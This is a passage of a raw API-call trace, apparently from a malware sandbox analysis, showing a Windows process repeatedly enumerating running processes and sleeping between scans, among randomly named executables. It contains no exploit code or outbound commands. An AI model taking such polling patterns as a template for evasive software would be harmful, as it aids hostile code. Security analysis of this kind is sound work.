Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0139.662] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0139.663] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0139.665] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0139.666] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0139.668] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0139.669] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0139.671] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0139.672] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0139.674] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0139.675] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0139.677] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0139.678] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0139.680] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.681] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0139.683] CloseHandle (hObject=0xc4) returned 1 [0139.683] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0139.690] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0139.728] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0139.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0139.730] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0139.731] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0139.731] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0139.732] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0139.732] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0139.733] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.734] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.735] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.735] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.736] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.736] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0139.737] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.738] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.738] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0139.740] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.741] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0139.742] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0139.743] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0139.744] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0139.745] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.746] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0139.748] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0139.749] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0139.750] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0139.751] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0139.752] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0139.753] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0139.754] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0139.756] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0139.757] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0139.758] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0139.759] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0139.802] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0139.804] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0139.805] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0139.807] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0139.808] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0139.810] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0139.811] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0139.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0139.814] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0139.816] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.831] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0139.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0139.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0139.834] CloseHandle (hObject=0xbc) returned 1 [0139.834] Sleep (dwMilliseconds=0x12c) [0140.811] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0140.827] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.828] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0140.829] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0140.830] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0140.831] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0140.832] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0140.833] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0140.834] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0140.835] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0140.836] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0140.836] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.837] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.838] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.839] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.840] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.841] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0140.842] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, 